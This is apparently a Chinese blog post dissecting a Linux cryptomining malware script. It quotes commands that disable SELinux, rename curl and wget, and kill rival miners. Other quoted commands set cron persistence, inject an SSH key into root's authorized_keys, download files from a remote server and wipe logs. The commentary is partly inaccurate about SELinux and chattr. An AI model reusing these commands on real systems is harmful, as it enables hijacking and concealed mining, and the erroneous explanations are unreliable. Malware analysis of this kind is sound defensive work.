01.Code 1 #!/bin/sh 脚本的第一行,看起来是一行注释,但其实并不是。它规定了接下来的脚本,将要采用哪一个 SHELL 执行。 像我们平常用的 bash、zsh 等,属于 sh 的超集,这个脚本使用 sh 作为执行的 shell,具有更好的可移植性。 02.Code 2 setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null setenforce 是 Linux 的 selinux 防火墙配置命令,执行 setenforce 0 表示关闭 selinux 防火墙。2 代表的是标准错误(stderr)的意思。 因此,可以通过使用重定向符号将命令的错误输出传送到 /dev/null 设备来避免错误的输出。这个设备是一个虚拟设备,意思是什么都不干。非常适合静悄悄的干坏事。 03.Code 3 sync && echo 3 >/proc/sys/vm/drop_caches 脚本贴心的帮我们释放了一些内存资源,以便获取更多的资源进行挖矿。 众所周知,Linux 系统会随着长时间的运行,会产生很多缓存,清理方式就是写一个数字到 drop_caches 文件里,这个数字通常为 3。 sync 命令将所有未写的系统缓冲区写到磁盘中,执行之后就可以放心的释放缓存了。 04.Code 4 crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/sysupdates rtdir="/etc/sysupdates" bbdir="/usr/bin/curl" bbdira="/usr/bin/cur" ccdir="/usr/bin/wget" ccdira="/usr/bin/wge" mv /usr/bin/wget /usr/bin/get mv /usr/bin/xget /usr/bin/get mv /usr/bin/get /usr/bin/wge mv /usr/bin/curl /usr/bin/url mv /usr/bin/xurl /usr/bin/url mv /usr/bin/url /usr/bin/cur 没错,上面这些语句就是完成了一些普通的操作。需要注意的是,它使用 mv 命令对我们常用的一些命令进行了重命名。 这在执行命令的时候,就会显得分成功能的蛋疼。这脚本已经更改了计算机的一些文件,属于犯罪的范畴了。 脚本为了复用一些功能,抽象出了很多的函数。我们直接跳到 main 函数的执行,然后看一下这个过程。 05.Code 5 首先是 kill_miner_proc 函数。代码很长,就不全部贴出来了。 kill_miner_proc() { ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ... pkill -f biosetjenkins pkill -f Loopback ... crontab -r rm -rf /var/spool/cron/* 挖矿领域是一个相爱相杀的领域。这个方法首先使用 ps、grep、kill 一套组合,干掉了同行的挖矿脚本,然后停掉了同行的 cron 脚本,黑吃黑的感觉。 在这段脚本里,使用了 pkill 命令。这个命令会终止进程,并按终端号踢出用户,比较暴力。 06.Code 6 接下来执行的是 kill_sus_proc 函数。 ps axf -o "pid"|while read procid do ... done ps 加上 o 参数,可以指定要输出的列,在这里只输出的进程的 pid,然后使用 read 函数,对 procid 进行遍历操作。 07.Code 7 ls -l /proc/$procid/exe | grep /tmp if [ $? -ne 1 ] then ... fi 上面就是遍历操作过程了,我们可以看到 if 语句的语法。其中 $? 指的是上一个命令的退出状态。 0 表示没有错误,其他任何值表明有错误。"tmp"是可匹配的字符串,即"-ne"表示不等于。 08.Code 8 ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid do ... done 呵呵,上面又来了一次循环遍历。不过这次针对的目标,是 CPU 使用超过 40% 的进程。这就有点狠了:影响我挖矿的进程,都得死!相煎何太急。 09.Code 9 再接下来,脚本针对不同的用户属性,进行了不同的操作。 首先是 root 用户。通过判断是否存在 $rtdir 文件,来确定是否是 root 权限。 chattr -i /etc/sysupdate* chattr -i /etc/config.json* chattr -i /etc/update.sh* chattr -i /root/.ssh/authorized_keys* chattr -i /etc/networkservice 使用 chattr 命令将一些关键文件设为只读属性,防止不必要的修改是明智的安全措施。然后,操作 cron 程序,把脚本的更新服务加入到定时中。 就是下面这段脚本。 10.Code 10 if [ ! -f "/usr/bin/crontab" ] then echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir} else [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab - fi 注意 [[ $cont =~ "update.sh" ]] 这以小段代码,怪异的很。Shell中内置的[[ ]]命令支持字符串的模式匹配。 =~ 可以使用 shell 正则表达式,这让它变得非常强大。由于它的输出结果为布尔类型,因此可以使用||进行连接。 而后面的单小括号 (),是的是一个命令组,括号中多个命令之间用分号隔开,最后一个命令可以没有分号;和 `cmd` 的效果基本是一样的。 11.Code 11 搞完了定时任务,就要配置 ssh 自动登录了,通过把公钥追加到信任列表中就可以。 chmod 700 /root/.ssh/ echo >> /root/.ssh/authorized_keys chmod 600 root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/ 12.Code 12 说曹操曹操就到,下面的脚本就使用了 `` 进行操作。 filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'` if [ "$filesize_config" -ne "$config_size" ] then pkill -f sysupdate rm /etc/config.json downloads $config_url /etc/config.json $config_url_backup else echo "no need download" fi 进行一系列操作以获取配置文件的大小,如果文件大小不符合要求,则重新下载一个文件。这就用到了 downloads 函数。 shell 中的函数,看起来比较怪异,后面的参数传递,就像是脚本传递一样,传送给函数。 13.Code 13 downloads $config_url /etc/config.json $config_url_backup 这句话,就传递了三个参数。当然,文件要从遥远的服务器上下载。我们一无所知,除了域名以 .de 结尾,表明它是德国的域名。 downloads() { if [ -f "/usr/bin/curl" ] then echo $1,$2 http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1` if [ "$http_code" -eq "200" ] then curl --connect-timeout 10 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then curl --connect-timeout 10 --retry 100 $1 > $2 else curl --connect-timeout 10 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/cur" ] then http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1` if [ "$http_code" -eq "200" ] then cur --connect-timeout 10 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then cur --connect-timeout 10 --retry 100 $1 > $2 else cur --connect-timeout 10 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/wget" ] then wget --timeout=10 --tries=100 -O $2 $1 if [ $? -ne 0 ] then wget --timeout=10 --tries=100 -O $2 $3 fi elif [ -f "/usr/bin/wge" ] then wge --timeout=10 --tries=100 -O $2 $1 if [ $? -eq 0 ] then wge --timeout=10 --tries=100 -O $2 $3 fi fi } 我觉得这段代码的作者写得很差,非常长,没有体现自己的实际水平。应该是赶工期,没有想好代码的复用,才会写的这么有失水准。 我们上面说到,脚本改了几个命令的名字,其中就有 curl。该命令非常强大,以至于脚本作者不得不添加多个参数
如果没有 curl?那就使用替补的 wget,套路都是一样的。 14.Code 14 接下来是一系列相似的操作,最后,对 iptables 一批操作。 iptables -F iptables -X iptables -A OUTPUT -p tcp --dport 3333 -j DROP iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -I INPUT -s 43.245.222.57 -j DROP service iptables reload 15.Code 15 细心的脚本编写者,还使用命令清理了操作日志。 history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_history |